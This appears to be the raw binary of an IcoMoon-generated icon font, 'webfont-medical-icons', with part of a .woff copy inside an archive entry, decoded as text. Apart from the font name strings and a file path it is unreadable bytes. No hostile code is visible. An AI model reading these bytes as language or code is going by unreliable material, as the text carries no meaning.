��������.�""""�{���3Rg����6�����*Nm>47&6&4'.302625'"32>'6.#4.#324203>'&>7>'6.'>2#0".1.'4&64764>74>32#1".'0"#".'4&4&7&>7>7"#".'4&4&74>7>7.2232>5646&5.#'32>7.#"!"3!2>'.##7#!7##7&>;'#".'72>'6.'&".7&646'7">5>323272>56&4&'.+"3"676.#*.'.467>#*.#4.5&<65>27#1".'4&4&74>32'""#".5&4&65>7623:>7>'6&4&'.:>5>&'.3' 	^%

	;8$,��0%#2�2#%0~'�d&�2H+g	#*2 ;+

_*D-�H�	'
%	���`�Q/3Qh4	UR<yJD�@��$1�0%%0�1$�q����!>1	
T*+:!# n,5��T�=RU	
5gR2X�IJ�/
����)>W��(=Rg|"32>54.#'"32>54.#7"32>54.#%!"3!2>54.##54./.=4>323<.'./.54>324>32#".5#5<>?>32346465>?>54.'54>32#35*#<5:3"32>54.#7"32>54.#'"32>54.#".54>32#Z		d						f�1$$1�1$$1�L��	
	SR	��(D[43\D''D\34[D(����	RS	
�;SS



�`/S>##>S//R>$$>R/)H55H))G66G)		A		�				�$1�1$$1�1$��>
	�	�		�
		\		X	�	�3[D((D[34[D((D[4�	�	
>	�	X		\		
�		�?SSB



W		�		�$>R//S>$$>S//R>$�W6H()H5  5H)(H6

����#.9DOZepty��!"3!2>54.#.11&>7&>7&>7.67.7.7.7!/%0#".'#".'.1.54>32>323'{�0$$0�0$$0�!%&&�Kq	

6ɣ�����
�M�			

		
		

	

	�5�c�$0�0$$0�0$�$!e# ^# ^#!"!#h!#^ #^ #����&�&�>		�'�����1EYv0" "1"3!2>54.#2#".54>3'.674>1'7.?'707'#5.?>;2'����*)(

)��&&&&Nc
S=?
�b><R
T�R�	}	�
�+��))+&&&&�-gS<>gg><S�WONT��
	���).3���57'>7'%&7'>54.5'575'54.'&".5"&>3>54.5362754.'.'.47".'.54>3564$5%>54..54>7'ø
/Rm>/,(����/-)�ea
/Rm?�$
%


?	?
	
$
����*))*�tO�i==i�OP�i==i�PqE�)+0?lS.�{	�Gb(..>nQ0��GEEG},*
	

		


!	


		&�
)��(
*,��>h�NQ�j<<j�QN�h>	����#(Ap`j"32>54.#3#553#53#553#5!"3!2>54.##5##5#".=#".5<6570>7>32.#*#.#".#"*#"32>732>7354>7>742041>5."&#"*.5&4>3>3:4.#"8181".'81811"1"&"&5.'"&*#""*1".5&<63>32:3>7.'#*&#+"""#*.'.467>;8126263.'.74>23>5.'.467>281232>7&4&454>324>7>2>7>2811*"1".1.'3>71>7>54.'>454.'35<5#?
		
		HHHHHHHH-�1$$1�1$$1�KH�/, (	?
6N`4>oR/+



		





			
		
	
		


		
		





			
	

�HH	

	��''7''n''�''�$1�1$$1�1$�w��))]!+T	�	+N<$0Rn?$D<5�
	
	

SX

	
	








		

		

W



��'����Al����!"3!2>76.#732+".'>;7'#"#'%"#>32#".'332>'6.##".'>32'!!".'332>'6.#"#>32#.""23>2202032>'6.#y�1#%/�/%#1��}�		�			t`\s	
	>�h/6@!5ZF&&FZ592-|	#?--?#_�����;o[J~0<B%8fJ,,Jf8)G@2L1GatBO�i>>i�ON)&)%$%�$1�1$$1�1$�Q




l\
	, (D[44\D($.>$#>/�


		
�11��">W3- ,Kd:9eK+&6 :bG(>i�PQ�j=�����-:GTav�����$1p�!"3!2>76.##".'>32'#52>7'7'>''7'>&''7'>&''2#".'>3'6.'7.'6.'>2#".'>3#".':3#".'6&6&3##7#2#".7&6&6'>30:3332>7.'72>':324.'6#".7'##".'##".7##".'7&>;2.5'##7#'.457>#3"x�1$&/�/%#1		

		,
3	
=
J	
r		�
	-
%		;

	
\			

	



H
	�$/�/$&]&�$0�0$$0�0$�A

	

	�
	?


2
	"

		



		�	4
)
	

	
l�).%��%.))1+	44	+1)�	
��

��
		
*��
		
�

�		Ĭ|��|�		�����-3!"3!2>54.#2#".54>3#".5<1#!#0#".5<54>3:354.7>3>45<15>70+8+";2+";2+";2>54.+".54>;2>54.+".54>;>7>&'&"153026.'.'5:32o�0$$0�0$$0��))((#



)��(



)6!(





	




��

���

��

�	


)#4'�$0�0$$0�0$V)(()�



doY��yYod




duh4&j
	68+�
	








�+86	
h&4hud

����|�AKs����32>=#0".50.'1#".50.'10#&"&50.'*1*.50.'1#".50.'10#&"&'0.'*#3'3220>14>320>14>320:1020>16462720>1>32354.+"1!"3!2>54.#232>54>32#54.#"#".54>32!5!%301##>181#0.54>12#".54>332+".54>35!#4>312!54>32#!!��
		
#
	
�
	�1$$1�1$$1�				

h	�er��A		
K

/I		I		,��C	
X		BB��@	
)		
			
	(
	W	#"	
	#"	$`


`#$1�1$$1�1$�	
��		

��l��


�

u				��qq�		�
		
���	������7C\s������
2>54.#"3'2762#*&#.4'54>33535#5##3%!"3!2>54.#2.#"'>3#".54>32>;2#'##7##7!2!52#".54>3".54>32#+".54>;2#5!#4>312!54>32�

)5]#�1$$1�1$$1��	0







�	^
	))�))ys	�d�''''8
		


3	I

I	
B��C	
Y		�

�0>�%0�0$$0�0%l2		1	{







h
		
�gggg��	l��''''�)				�qq�

�		��
����-BG}!"3!2>76.#".7&>32#"32>'6.##'33#7&>7>&'.#"+&>7>}�+!)�*!,�{J�a::a�JL�d88d�L;fM++Mf;:gK..Kg:*RTTT


P
%27
� *�*  *�* ��9c�KK�b99b�KK�c9�,Lg::gL--Lg::gL,��UU		S	 ':(-02	����)>Sh�������)>Sh}���*&"2>7>.''>7>.'.3>7>.'.'>7>.'.27>4'.!"3!2>54.#>&'.672#".54>3#.7>3'>&'.67>'".52'.5>.'&4>7>'>&'.47&'.47>'>2"&'.467>2&'.467'>".'.>7#"./#4>?>7>'.'&4>7627&'.47>#".5<1##5###0#".5<54>3:3267>4'.�-;/%�0$$0�0$$0��.



F
)�! �?	'�/'$
�	

aa	
	(
=E=&��/��$0�0$$0�0$xC



��73p�M4lu !ù2s�		�

Fj

R6�			JRB��ddqBRJ			IWM&&MWIB
����!&+05:mr��0" "1"3!2>54.#'7'77'7'7'?''77"#".54>32#".'.'.#'7#".54>3232>=4>54.#"#".54>32'7����)
())�&%�A]]/]]-\]�]]?]]	/@$&C3
"�\]u#..$	

(0( 6J)-'"		

*F_54]D(
7&&�+��)

(*�&&��]].]\�]]�]\]]�



$@00@%
	

�]]F%&+8,!".

>0E?E/*J6 			5\E()F]5$ p&%����%!"3!2>54.###5#53533w�1$$1�1$$1?�������$1�1$$1�1$��������
	���-CP����	t��!"3!2>54.#2#".54>3"10".'.53%!'5!!5!0*1"./##0*&1.4?5#1#0*1.450>1>130010*1".5'1#4>32#".5#".54>32#".54>32#<54>3:3237>130!#".54>7'.467>237>;2132>54.'502>7>52#5##".54>32#<54>3:32~�1$$1�1$$1d8�od��:���&&&
F
&h



��5�'***��IY^B,	

�
�6��$1�1$$1�1$�~

	��r}}������UK

KU�&

� 		�!!r

r�Y^B66��	��!!����	8Mbw����$3#'73#737##";.>72" "3"3!2>'.#23".'>32#".7&>#"'.>7>#2'>#2".'.67&>323"#".7#".'7&>72>73.'.3"'".3">7'"#24>7>2>23"#!3'7'7#7733#7'3#'fA??A�\�&�

������)))
)��

	



	0	

Q


	3

1�
1=1V	



	
	

.�wYTw.	���BA$9777$?Ax?AA?m���QQ��*��
	
	.*��(
(
*.�F��
	


�e�	3��

,Z


	
u��30*SXXS)02���QQ		����-BW:Z�,d!"3!2>76.#2#".7&>3'2#".'>3'2#".7&>37>;27>#3""2#:32#".7&6&6+"#".'6&6&3#2#".7&6&6'.#"2"2#.7'#"#".'6&6&3#2#".7&6&6+1"#*.'"4&6/###".7'##".'7#7#'.7"./32>71#!".'.'7"242#.'*1*'3''>32'>7""374:3:2>7"6"2'7>7##%#".'.'.'.#".'"4&4#>7:612:332>7'.'0*#*'7.'7.'"4&4#>32z�1#%/�/%#1�
		
�





�

!S
n
#			

!

! 1+	,1 

! $#'<,()


	,()




#$&w%%" !""$ ! 




"%%�$0�0$$0�0$���				��v::u
9F>"$$"9F@rcyk		>C66C>		kycpqƌ����r�	

@Zxx
@ZxwY@


		

	�xx\@

����)0" "1"3!2>54.###5#53533����)
())<�������+��)

(*������������i!"3!2>76.##".6746&6'.#"#".'&<6'.7>7632>w�1#%/�/%#1�

	
+--/+-�$1�1$$1�1$��"*5##?12<$$<21?##5*"8<@%		%@<8
����.Q`4.#*#:32>5!"3!2>54.#6:32#*##!".5#!".=![!!+��*  *+  +���7))7
����m
= 
� � +��*  *+ ��'56'

9�]

����
&=0354.1!"3!2>54.##54.10#757
B

p�1$$1�1$$1N���_`�v55?$1�1$$1�1$��|  |^���^������AF[�!"3!2>54.#732+".54>;7'#"#55!!%4>32#".5#0*#".5<5462>54.'#0<5&>361v�1$$1�1$$1���



�	
u_]r
�o��	





	�v�z	-6-4W@$$@W4�	T�qB�$0�0%%0�0$�""





	\�11�







��
"&!K;Re88eR;U"+&
	6h�Rm�n����$;Pgl3737#7##3%!"3!2>76.#2.#"'>3#".7&>32>;2#'#!7##7!7!�!��2#%0�0%#2��)-(8
7*)*f$&&$��(�'9S&#��$&U:>�
���$0�0$$0�0$tj

f�$$%%��~~~~���HH����-DY���!"3!2>54.#2#".54>3>;2#'##7##7%2#".54>3.'1#".50<&54>?>1/0&4676210".1'&'.1.''7!"1'0>7>3!u�1$$1�1$$1�





�w,6 �6+��
		




)

&
	


7	
�zy���&( $.)d�%0�1$$1�0%�





��nnnn��


		


��
�$]S9


_ue�
	

#f
 qqP#%#,(/
����)>Sh��,G"3>56.''"32>54.#72>54.#"3'"32>54.#"32>54.#!"3!2>54.#!0>767>27>27>27>21%!57>4&'.#7>4&'.'>4&'."4.'."#".54646570>7>32'"32>54.#7#32+32>54.#3		%	�				�		,�0$$0�0$$0����		�		��		��		�
m		l���&	?
6N`3>nR/+�"



  	2#�				�		A$0�0$$0�0$�{QbR
�		��		��		�
m		m��S
&	�	*N<#/Rm>$D<4�	

  �L�~_<�δgδg�����������0�67!��	�����[�:<�478������[����	
��7���]
����b	/`������
��gs���

	����		�
���
��
		��	
��

�	��
	�
			�

�����
�N� `��	�
P<
�xfP��<D��p4�ZH� �"�$%:&J',(�)�+�,p-�-�123�4�5B6H9:<=R?X@�A D EE.GH�KTKrMMxM�N
N�O<O�QQRR�S�UHV0W,Y|Z�[\\]�^F`*a�b�c�e�f�g>h h�i�kk�mm�n�o�p�p�qpsbt�vJy4{�|�~j����„��<�v�R�x��<� �*�В
���L����>���L�R���F�ު`���v��4���n�*�*@*�*j
(�	*	�	*@	*�	*	*	
(�webfont-medical-iconsVersion 0.0webfont-medical-iconswebfont-medical-iconswebfont-medical-iconsRegularwebfont-medical-iconsGenerated by IcoMoonPK!�j�@e@eGit_sanctum/fonts/webfont-medical-icons/fonts/webfont-medical-icons.woffnu&1i�wOFFe@d�OS/2``��cmaph<<̀�gasp�glyf�]�]�b�Khead_|66�{Khhea_�$$�]hmtx_�HHAP�locab &&.[ѠmaxpcH  �pnamech��c��poste   �������3	@ �������@ ( �� �������79���{�=]r".54>32#.'#!#'.7>130"#33535#5>54.#".54>32#."".-"#-S

`/��Ú/`


c43%�&24c
�� 8*$0../..0#*8 ''''�"..!!.."��	
P����
	X4774��1*8 3)*.//.*)3 8*��''''
0����0F\s���-%772#".'>332>7'6.#"+'3'>;2!".7>;23>56./&".7&>32#3'2>7.#";'*&5".4'7&>32#726##73#&/.;2>7>&/.+";2>?>&'..5"4&672>7'
��&A??$&##	
	
E

�H

=

����

=

��
�	

�	
��3$%21&&1$$&&4C�
O

�2!� 3�

O
�,		�$##$�C���	����	��L&
&"%22%%22%"&&&&UO= �Y<^
��
^<Y����'4B^w�>4&'71'>4&'>&''>4&''>4&'#'3".'.467>32>510<14.+0:92>510<14.+0:9�))((%$%%4!!!!)$


	

	�CE44FF^
J
J")gjg)%]a]%T!TVT!JNJ�@CA676$-/,#%#


�$b����i%--/1 	�e?L?
���ANA
��6����!.C�%>&/3!!3'!!#'7"&'267'>&'.67.'0.'>14.#"7.#0"72>3067>7>&'s
U�g�6�3M!�>cDJ?I���J #$# �JL "
	
!"	Q '�5�
M��"Z��j�xIJJI!��;)	L2:
	



7����3Mg�����7Qk����32+".=4>31;2+".=4>31!32+".=4>31!32+".=4>31;2+".=4>3132+".=4>31;2+".=4>31!32+".=4>31!32+".=4>31;2+".=4>31%32+".=4>31#32+".=4>31!32+".=4>31;2+".=4>31!2#!".=4>31.'&34>7>23310:12>=#09!30:612>=#013�O

O

�OO

�|O

O

�}N

N
�OO

�O

O

�O

O

�|O

O�}OO

�O

O

�O

O

�O

O�}OO

�O

O

��

�p�"Z����`#�*),-�
;E;
�_
<H<	�O
=

=

=

=

=

=

=

=

=

=
��<

<<

<<

<<

<<

<�
==

==

==

==
��
;;
�>?10@A


V

D

D!����#(6@U���&4>?626.'.>7'!!#".54>;4>3!!57#".54>32'.+">7>./733.'.47>?'36?>&'#".'#32>5<&'#'>323.#"33/73*\
\
�6��$�������####6�
6	~
	d'Li	L'e�	

	F''FG		<;{"%3

2760#����@�
�@	�`�""##�

�

T	
BN?2




2?NB
	T

b&&

		���737373737!####!����
������7����[�������k�
#8=B��%#".=3#5##5!#".=32#".54>3!!!!32#".'0#<1#".54>;5#".54>;5#".54>;5#".54>;5#".54>;5332+32+32+32+!"!.#)

	
_~�-�>��


`�-""--""-_�A�n� ��X

/

X\\ggaaLL/LLaagg\\y��$!
	$6



**rDD�*



**!-.!!.-!����ey��X�		a

	���I;P`��2>54.#"30" "#"1032(12>4150.+"#732>54.#"%35801!'.'.>7*1";3.54>;7#"!>54.#%".'&4>?'5#0>7>;2�""##���(\
\!J



��	L�+���?-3;0

�?��

j
�uy�
		

��

�)#gdq>L@

!B��""""��
M
�



�
�e�>

	
_	
		
 


K

2c
U%gmDSF"&�6����-<AZ_di#'>54.+35326:3373'7'#532#3!2>5!!!'!2>=4.#!"3%3#5#3#5#3#5�$&1	

"f3.E9$'&5A8�%!

�

�
	�7-o��D��
�78�DZ#���}fFFve.p

��

����T���vvvvvv	���R�z���$Xm2>'6.#"3".3.032>732>746&6'6.'&"&""#".5&6&6'>7.+"#63">323">##".'6&6&7#.7&>7'3'33##'#'4>?>22"3#".'".7&>32#3".'>32#7".7&6465>47.'.7"2"6#>76#2>7.#"3�

)
	


�##!%	3F&(D4SCLCAJA�
	
	
�&&$$�$$%%�
		
!
�

�
		
[

		F		#


'E33E'


#�oKBBKBB	 :50


	$7$��%%%%%%%%�		


05: $7$/
		
����2G\q�������%'7>'6.'7'7''77#*3!'2*#"32>7.#".'>32#':3&6&6'*#7"32>'6.#73#".'>32#7".7&>32#7".'>32#".7&>32#7".'>32#i���)*>$oG��#=!s*'E[5"I:&<'.��/V?%%?V/2T@$$@T2-L:!!:L-+N9""9N+z

{(B33B(%D00D%�KMP	

	

-			

	




A			

			

			q�(�t9@F%.VL@�0)0�#;#;�.7>!4\D(__�%@U01U?%%?U10U@%�B!:M,,M:!!:M,,M:!��2C&&C22C&&C2�NN�



T��

p���!���>56.#&'.'6&64?''7>7'3>/&4./7223>74.'.1.4/.'>'6.� 

�	�i
Hn	
~
	
Z
	#*!	
#'%)
7		

 �		/�
24+

���

k&&IO@	���	
�

�\


	F[����*?Tif{!5#".=#".5<64?0>7>32"32>54.#%32>54.#"%32>54.#"75'.'7'.'&"&"1'#'5'.'7'.'0*/#"'"730:337>77'>506<5772213'17:23372>77'>706<?5'.'7'.'"&*#'#7>77'>74646532>54.#"�h< 6)3PEcyAP�h<&6!��				r	

	��		�:8"(/8	0(!0%$ &%% 8"(/10(!�		��u)7k�%'6cL-<h�P-VMB/		]		,	

	Y
8
1(!;8"'/ &%% '%.
0(!;4"'/�	

	
����(IV[`ej���.54>76754.'%.54>765'5557%%%%%%.54>7'%%.54>7'2 ����������@AA@@@��;��t��t���Ssoos��Ssooa�<����B@??AAi��7�<6��p8����V����V���� Qg5##335352>54.#"35"#".54>7>;2#*./!717'.>5'76�kkkkk�1$$10%%0�w�"�"�w�dΚ'5(��(5'�;kkjkkj��$11$$11$��v!


��
!vR384 �CC� 483	����)-1FUYu�"32>54.#3"32>54.#37%37%2>54.#"333##!'!'.#"!7>4'"&"&'.?3#1�

�

��/-.���J!0!#..##.�*�SS��I%B�_71U�"8+�~�Q/t9
	m��R���#//##//#�	����5�V���Ƙ#
�

���
����2Gg%'7>7.'7'7''77#*#!7*#'3'#3#'3'#3#!#!332>'332>733^���*/?)xN��$@%|. +Hb7&L?'_,/��YBZb�a?��B
BA��*�{<DK(1[QD�3-3�?%?�1:B#8aI*ffQQQQ�l���O��


��


�������=Rg�".54>32#.'#!#'.7>130%"32>54.#.67>&'&'.'.1.'.>7>1>7'"./.>76201/""//##/\
b0����0b

e54&�'36e

��'F33F''E44E')		
*
	



	�#..##..#��		X��$��		`5885���4E('E44E'(E4�
		@

#7,

����%2G\�6"./!&>;227#7##337372>7.#"32>'6.#"3"'7''7'77>733#

�

B��c
h	*:8�@K?=I>,##,/  /�.!!.,##,'G�
"�H�
	���'
23��!--)�>>K>>KL"--""--""--""--"!
'B'��

&���:����!�%>&/3!!3'!!#''32#".'#5#".54>;5#".54>;5#".54>;5#".54>;5#".54>;5332+32+32+32+r

T�n�5�2M!�C]DI��P�������P������V &�9�
L��#X��o�M2 0 (#bb#(!0 2333333<����#=Ubk%>&/3!!3'/!!#'+#32'.+32>7>'6.'%#3#3#3%##'#'3n
U�u�4�6!�GVD�
<;x

.	64	=������T:T�X &�>�
N��6Q"X��s@9e
fS
	<1H3222��24����#E���%>&/3!!3'/!!#'3#5<5<5#'#37#.5.4&=4.'.+#3232>7>54.'.+#3m

U�l�6�6!�A_C�V76:58W43D
A	
:;�

{@	A;;S '�8�
O��7R"Y��m@�������


	
	p*M
	���7����#v��%>&/3!!3'/!!#'>32#.'.#"32>7>73#".'.54>7%3#'##3'%##5#53q

T�k�6�6!�@aD�a	
<

;


	
	
	=DeAi?fI$%�U<V�U '�7�N��7R#Y��l@�	
	

	
		


!
��::�pp�2��28����#v%>&/3!!3'/!!#'>32#.'.#"32>7>73#".'.54>7%##5#53r

T�l�6�6 �B_D��	
;	

;

	
	
	�U<V�U '�8�
N��6R#Y��mA�

	
	



!
2��2����@U#5#4.#"67>73!2>54.'535".54>32#zw#
	&"			*
)(	')x'���
		
		l,
	
!


#):'��V':)*,�+ 

		

����FRg|��k21!#+".54>;7>3332>54.'52>5##".532#".54>32>54.#"3'2>54.#"3#2>54.#"332>5<13032>5<13032>=4.#0*1/."1#0"'."1#0">573332>=332>=3'332>573032>5<13032>5<1331j 2"��G
��i
 		
}?****��

		�


		�




Y	]H
)%$)
%�!/��]j	
�*<'�
	�'=*+44+**  **



�	


	




��6<1A	d44eb�yyyy�bbUi[4;..;4[iU_�����+9Fh�����*32>7.#%!!!!!!#'3#3#33#7#'#73733#73#3#33#'6&4&1##726:3207#".'>32.#"32>47'#'3#73#3#33#'1#'33'3".'>32.#"32>7#7#7'373�
����IJJ����BB&$"*z^C?("$(g


l	
	


*ZD@("$(o+(I
	
		g$ �(uI������HI� %V22V�22�� %/5�

6:



:� %RR�NN�
		532S<<R��>�:Uw�������	0%4.#!"13!2>51'!!4>76"&/&>'65'>/."?#0*1".=4>30:121#26=+26=7#".54>32#0*1".=4>30:121#26=+26=7#".54>32#0*1".=4>30:121#26=+26=7#".54>32>�?
�
T�D�o .on-�� -
on
-�&!%+& 



d%!&,& d%!&+&



�

�@
��Gi�8
��
9����8
��
9��gkk�



��



��

�kk�



��



��

�kk�



��



��

[����i~����<o����."#;6&>7>7>32+;37&>323'>323>'6.#2#".7&>3&>7>32#*1".'#".7&>;2#32+".7&>3>762#0"&"5.674>#*&0#.'.5#*.5.'.74>74>3>7630"1".'2"2"3.'.47.'.467>2"*#".5#".'7&6&4'4>727.'.>7>0"1".'&4.'4>76#2"2"3".'#".7'>32732>7.+'32+(@yaEN


)3:X&� 6%<f�M��



-		N//		//m
	
	}	
	^		

	
	8		)	
**�,Kb6&%�		J3&tBALU.N�g;��				��5
	*��
�		
_	
	�
		
_

j..G"
"))�����	u������2G\q��#'0&467!'#".54>32'5<6454.#*5""1532>5<''02857532>54.'7#".54>32#".54>32'4>32#".5#".54>32#".54>32#".54>32#".54>323#".54>325#".54>327#".54>327#".54>327#".54>32#".54>327#".54>32���2�""""Rg"�	
��		
�$X
$ '$^����""""�ti�"t���el�
	
	�R'&$!(�����	322>#>722>#>322:#2">3&>72">34>32":37>7.#"3".#"".5".'3#.7".'3#".'".'*3".'2.'##.'2.'##".'2.'*#3">7#XY


	


	
>Z=Uh57eW9Z; �	
		



7�}UX}�6G�		|}]:SY 
#,*		|}]:SY 
#,*DKL!*YI.CQCCPC-GY,&RK?( (?M%.n^@ (?M%.n^@`�o<<o�`����)>{����2>54.#"3%2>54.#"3"32>54.##5.535.'.54>753#4.#'.54>7533'33'.+"37%23##".5<5##".5<55!<1.?>;�

E��&C22C&&C33C&,/
,
.
,
	-_#�$$D,!| +D$�-\

	

	
�Q����



�G2C'&C22C&'C2��
7
4	�+g/3����

��l�X��	

	
izllzi
	

	Ee|?Y+K8 ���YX���>2:32>#7>'7"2&2#6.'.'.#"*#.'.&'>7.3'#*.'.'#.'>7332>'6.'>32#".7'#".7'332>'73�	
�		
	"!##(39"B:)	%"=
�		2-2; 95+�5@F&@tT2&=R,.
!#!			4

H
�
4
1(��),1UsA5dQ9
1DD��##



l�&;Pe���5354>323##".54>32#4.#"32>5%#".54>32#4.#"32>5+4.#"!4.#"#".54>3!2'3'#5##33535#		�F""""1
	

	
�"##"1
	

	
�E!,-!��!-,!9
�J��E��iiiiii�
		
�""##				""##	

	


 }
-!!--!!-
�
	�����iihiih����3Mb���76.'.''>7>7.'7>7>'&>54.'.'&>7>./?7.'.47>?'76?>&'4>7'.56$5>45.'%-777&&57'%.54>77&%>54.'�

"%

"%			
	�%"

!!!!�.�.m
V"B
[
B"V
m&



��
%W
[!���mLg{

d
�tw�
		

_((%)&'�
		

 !

!!

H

	

%('4" 

 "���

�
I
:B8*

	
,6D8	G
	�  �
L		�lk
wvxwnq	

	

 	


����=]j�#".54>32%#".54>;232#54.+"#!".54>;232'5##33535#2!#+".54>;7>37� *+  +* �� ����������@@@@AA<+ �xI
��k
 !�u*  **  *��=����@@A@@A�+�Tcm	


�����P�����54>32#5<>?>323<>5>?>54.'!54.#"35<./.#"#<.5./.54>72>54.#"3#".54>32#2>54.#"3*#0."1'.1#0'.1#0>?3332>=332>=3'332>74>4373032>5<13032>5<130281232>5<13032>5<13032>5<54.#�
	

���i"j
��

���i"j
�		

�			

	�-	#
q
X
$#2-,2"!	
	
!

�����

!N�pt
����

!N�pt
�					

	�z		<<		{x����wwh�o		@G88G@		o�hxCI=#&&#AI<��KQ���!!5%#54.+".'.67.'.54>3"72;23#54.+".'.>7>54.#52323#5;#5U���.
{#3"#


{- G.%7#I
*";+"-G1u..H--��>

		
2'- 
	
		
)>T7,		&.(7 "8H$T��������cx��'.54>754.'&0457>=>577>5>=40405%>54.&4&4&'.'001>?>577>523>'7' 

l�								�H
�F

8d^

		
^d8

��88`�'
)������



p��r�



����
��
	�����		��		y�	��)���0?#"&5".5462354623546235462%"&5#462�
"'! !
 !'"83=2t��#
-


��	


��	


��	


���Q----7����Nr�����"Bb�����?_#5>54.#"13>;#"33!334.#%#".'.74>7>7#.74>32#.454>7>"#".'".54>32#5".54>32#6.'.5&>3&'&>2".'&4>7>""#1'".'&4>7>76*9*.#.67>#12>7>.'.3172>74.#";1':67>&'.31'2>7>.'.2312>7>746.'.31'12>54.#"3172>7>4&5.'.:317:>7>&'.31�s5H(">3#)~5X?!�-�/�9S5�	C1	'				_/
|

/;			�				5	�			6		ч"',(H5'3g$<M(������IB6"�	�		S�>e@heK��	
Ae=Keh	M	M	��		OP	>		�OP>	����-D���>7>75&>54.&''.'7'&"&5'.'.'.'.'&7>5<5742>?476..54>67'�6</(*52	�+

	




z))*G9#�#9G*�I
		
3	

	6 "


n



%���4;-&(1.@U�����	����/"("	
���}Kn{0�
			k�������)>SXm����c"32>54.#".54>32#:3<5*#7"32>54.#53#".54>32#7".54>32#7".54>32#".54>32#7".54>32#54.#"374./.#"#4&4&'./.54>7!54>32#5<>?>323<>5>?>54.'CvW33WvCBvX22XvB=jP..Pj=<kO//Ok<��5\E((E\55\E((E\5�jjm@		%				\��

���	j"l	
	�	��	j#l�3WvBCvW33WvCBvW3��.Ok=<kO..Ok<=kO.:�(E\54]E((E]45\E(�kk�				u���				�

��		��
�
"P�	r
v
�		��
�
"P�	r
v
����
 +6ALPTXc�6.'>.'4>74>754>76.'56.'!%3'-'0704.'#".'.1.54>32>320#".'{"
(
"	'"	'"	'"
("
(L�[������|
���0*21v	

	('
	
-*,#_,% -*$
�*-"y*-"�*-"�*,#y*-#��m��0����1��(.$"*&�]


((


���U�2FZ#".54>32#5.?>;2/#?>&'".1!/.670>1�&43''34&��s*�

�

�(v��qSU)�
	#��pRT)�
	$,4&&43''3�Jls(�
	�'vm8pSU)�$pSU)�$���~�����;2354.+".'.467>4&'.#".'.54>735;2354.+>54.'5#"3#5;#5"32>54.#'35#>32!4>7#!#".5

Q		Q	
0$ /%!�0��h��OO��hh��OO��h�
~)���5:= Q�j>��
�X�59= P�j=�
		))





$


$77/%
$&	!	�[[[[O��hh��OO��hh��O�	 =:5ZH
>j�Q =95�Z�
=j�P]����.CHMRWaQ"1;;3533>54.#".54>32#3#553#53#53#53#5#54>7>7302627>4'1.'>58401<.5>7>4&'.".'4>7>4&'.".54.#"#*.'81.'.".'&""#8+"2306261>;2>72232>7&"&"#"30:61>3:322326265>4&'1.584184014>738201812."#"27>32"001#54.'.'#".'#".54>7>3:3>32>32>2632'@xbDO	3(6;�Y^!5&;g�N��		OYYYYYYYYZY�
	%	
	



	


		
!				
			#	


$	
 


	
�,Kb5'%�i6)t44ABLT-N�f;�6				��00E00�11E11%0

!m
	



	








	

	



mh$	
	

���Bm��!!5%4>32#".5'#3.54>;7#"3!2>54.#2>54.#"3>32#".'#3"73>32#".'#32>54.##0*&1.".'4>7>2
���a��L�rt�
	�@pS11Sp@*MC8�
"%+L9!!9L+
�5>F%O�wX;_?LZ0F{\66\{F,RH=�Yq�Ic��JJ��cl--,011~<<~O�	

		
�U1Sq?@pT0'6!
!9L,+L9!, 1VxG	(A/5\|FF{\5(7"?jL*K��cb��Kl�k)6CP]jw�����B�2#".54>32#".54>3>7.767.767.76.'%>&'>4'>'>5''".54>32#327>/.1#02>?33'%2>5*#33032>5<54.#*###".54>75".5*#"32>5<13351%##".5##".5##".=4>;2#".=�				e�z	
2CN
I	
	TI	7				9*	+j+	)7�7�I		
		
		��	

	
�
?				,�

S	
F
	 		
(:|
�\�	��	���

+60092	<<	29006+�����		Z��		.�������_�2>54.#"3*#54>'.#.5<15.'0>&'#";2+";2+".54>;2>54.+".54>;2>54.+".54>;28132>4150"&>7>75*#"32>5<13!3032>5<54.#�2&&22&&2�	 +3 

		
$#	�



��



���	

	��		$
		 
0)%B3

	2v2

	0@$�%22%%22%*�BE5
�		
	

	


	



	
�
5EB �/@%��z


{�m�0�m�{


z��%@/	����4KU���.�#5!#4>312!54>322#".54>3+".54>;2%2!5!%4.#"#".54.#"32>54>323'30>54.1#01380103>5!!4>;2#'4.#"0.14.#"0.14."#0*#.14.#"0.14.#"0.14."+51#".=:31232>50>7132>50>7130:31232>50>7132>50>71;#�Z��[		
*		��

E	
b

b
		���	



	

r"X#�x�� 

�

	
�


"

8��=

���

�
�		
		
��� <		




��`

		!!��fR



�1
"#//

"#//��

6	#*

	#*


6

����5Uly�����4>32#".5%2!5!2>54.+";34.#"!4.#1"35!2.#"'>33535#5##3#".54>32"3733'33'.+".54>32#152>54.#"315""&'.4'54>32176211��	����		a		aY
	��		Y��	"

#
J







}77((�()67|�j3''34&&4''''6F�

*���				���		�2

�Εa

C	@
C_







R������)&44&&44&#''''XS@!����)_d#".54>32"32>54.#4>3230<54>7>.'.30<55#3�L��ed��LL��de��L�N�g;;g�NN�f;;f�Nc$'p!'	%!$LB2
&$l�pp�e��MM��ed��LL��dy;g�NN�f;;f�NN�g;��(	*& o%# BA< 6M5	
�Jrr����)>Sh}����'<Qf{�����>4'.67764.'.>77>.'.>764.'.>77>.'.>7>&'."267.'&4>7>.'.>7>*#"32>'6&6&;37333232>7&6&6'6.#.'&4>7>.'.>7>'"&'.>7>27"'.67>7"32>7.#>&'.47.47>&'&'.47>7&'.67>''.45>'.74>''.5>32>?64.'&'.'&37#
!&,
(*�		�
	D		�		�			>
	�		-P[O6'

	&(&		%4�		D	
�					�))''5				E	
&
	�		
��

S	
	
12

)"?�4$�	 '+		 '+	w	u		'	M	yJ	N	+&3fra
	

	blV����Vlb	

	
arf3&2	'		�H	Z(''(%[	4<	 		X		�		�	�	
	�\
	�
��2�A
b��{�R���������2#".54>3232>=4>54.#"#".54>32#".'.'.#"#".54>3'77'77'77'77'77'7'77'7
CuV3
&-;!!;-


"3=3(F]5 91+


5YxC	/UA&
		
%*'"

	

#<Q.�{vu;vu=vvGvvBvuCvuK/0>/0�4XvC-((006"G!8*+:!

 O;XQW;5]F(%CuX2b"<Q0	

	
	
.Q=$�vu;vv>vuEvu>vvIvv0/?00����!!!!!!]GG������G+GGG����/����/D_t���.�7".54>32#<54>3:32!%2>54.#"3<54.#*#"!%".54>32#7>130!5'!!!2>54.#"30.1.1#0010:32>?13:232>?3302623>/5313:61>45%".54>32#02>7>45#21;2>7>7354.#"1#".54>750".'.5#"#'."�



�
		 ��/





�
		 �&

�444����x��D�
		

		
t		V		0000�	F��
[	
	�
	7Sup�



�#)&		&)#�





�#)&		&)#�



�

�ǜ��3���


		

�$$]j����j]



b:
�� 	CD
Rup`����"'BOUbw������
